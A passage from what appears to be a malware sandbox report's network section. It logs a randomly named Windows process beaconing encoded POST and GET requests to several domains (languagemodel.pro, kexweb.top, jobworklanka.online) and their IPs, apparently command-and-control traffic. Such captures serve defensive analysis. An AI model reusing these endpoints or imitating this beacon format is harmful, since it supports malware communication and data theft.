                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 6e 35 72 76 59 52 31 38 35 5a 61 38 35 31 52 65 75 39 55 67 44 57 37 69 6c 33 39 5a 43 54 56 34 64 55 4c 63 5a 77 3d
                                                        Data Ascii: x0wHoJ8X=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdn5rvYR185Za851Reu9UgDW7il39ZCTV4dULcZw=
                                                        Sep 18, 2024 16:19:03.210390091 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:03 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        14 | 192.168.2.5 | 53628 | 217.70.184.50 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:19:05.179414034 CEST | 851 | OUT | POST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 36 44 79 32 2f 4b 49 79 79 38 69 2b 45 37 43 4f 6c 61 54 4e 58 72 68 57 6d 4c 55 68 6e 41 78 78 31 73 71 35 4a 2b
                                                        Data Ascii: x0wHoJ8X=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj6Dy2/KIyy8i+E7COlaTNXrhWmLUhnAxx1sq5J+
                                                        Sep 18, 2024 16:19:05.791811943 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        15 | 192.168.2.5 | 53629 | 217.70.184.50 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:19:07.730180979 CEST | 1868 | OUT | POST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:08.345907927 CEST  608                IN         HTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:08 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        16          192.168.2.5  53630        217.70.184.50   80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:10.276715040 CEST  566                OUT        GET /nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:11.054832935 CEST  1236               IN         HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:10 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Language
                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                        Sep 18, 2024 16:19:11.054877996 CEST  909                IN         Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=
                                                        Sep 18, 2024 16:19:11.054887056 CEST  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        17          192.168.2.5  53631        63.250.47.40    80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:16.778733969 CEST  810                OUT        POST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqTU375nI2KmHcsBaHANPmZ7hyrCLE7cr02cbUHo=
                                                        Sep 18, 2024 16:19:17.368331909 CEST  595                IN         HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:17 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        18          192.168.2.5  53632        63.250.47.40    80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:19.324834108 CEST  830                OUT        POST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15XZi4K8VL9CuVMrKQ9un4C8tuHLkb4e4w2C5cpU
                                                        Sep 18, 2024 16:19:19.914203882 CEST  595                IN         HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:19 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        19          192.168.2.5  53633        63.250.47.40    80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:21.869117975 CEST  1847               OUT        POST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:22.515882015 CEST  595                IN         HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:22 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        20          192.168.2.5  53634        63.250.47.40    80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:24.414429903 CEST  559                OUT        GET /3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:25.013453007 CEST  610                IN         HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:24 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        21          192.168.2.5  53635        91.184.0.200    80                1788  C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp                             Bytes transferred  Direction  Data
                                                        Sep 18, 2024 16:19:30.063503981 CEST  837                OUT        POST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBledh4NXPBa8/Og/a++UujEVBHb2shWAU7vKID8=
                                                        Sep 18, 2024 16:19:30.688004971 CEST  500                IN         HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:30 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 53636 | Destination IP: 91.184.0.200 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:32.606756926 CEST | Bytes transferred: 857 | Direction: OUT | Data: POST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 6f 74 52 55 54 42 39 52 33 70 4f 59 2f 36 57 55 70 42 42 34 46 58 49 4e 4f 43 44 6a 56 36 51 78 76 44 4f 49 4c 51
                                                        Data Ascii: x0wHoJ8X=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DotRUTB9R3pOY/6WUpBB4FXINOCDjV6QxvDOILQ
                                                        Timestamp: Sep 18, 2024 16:19:33.214298964 CEST | Bytes transferred: 500 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:33 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 53637 | Destination IP: 91.184.0.200 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:35.149058104 CEST | Bytes transferred: 1874 | Direction: OUT | Data: POST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
